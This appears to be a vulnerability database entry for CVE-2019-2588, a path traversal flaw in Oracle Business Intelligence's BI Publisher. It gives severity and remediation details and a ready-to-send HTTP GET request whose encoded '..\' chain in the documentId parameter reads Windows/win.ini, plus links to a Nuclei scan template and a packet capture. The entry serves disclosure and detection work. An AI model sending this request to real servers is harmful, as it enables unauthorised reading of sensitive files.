| Title | Oracle Business Intelligence - Path Traversal |
|---|---|
| Author | madrobot |
| Severity | Medium |
| Impact | An attacker can read sensitive files on the system, potentially leading to unauthorized access or exposure of sensitive information. |
| Remediation | Apply the necessary patches or updates provided by Oracle to fix the path traversal vulnerability. |
| CVSS Score | 4.9 |
| EPSS Score | 0.85962 |
| CVE ID | CVE-2019-2588 |
| Tags | cve cve2019 oracle lfi vkev vuln |
Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security).
GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-2588.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-2588.pcap
N/AN/A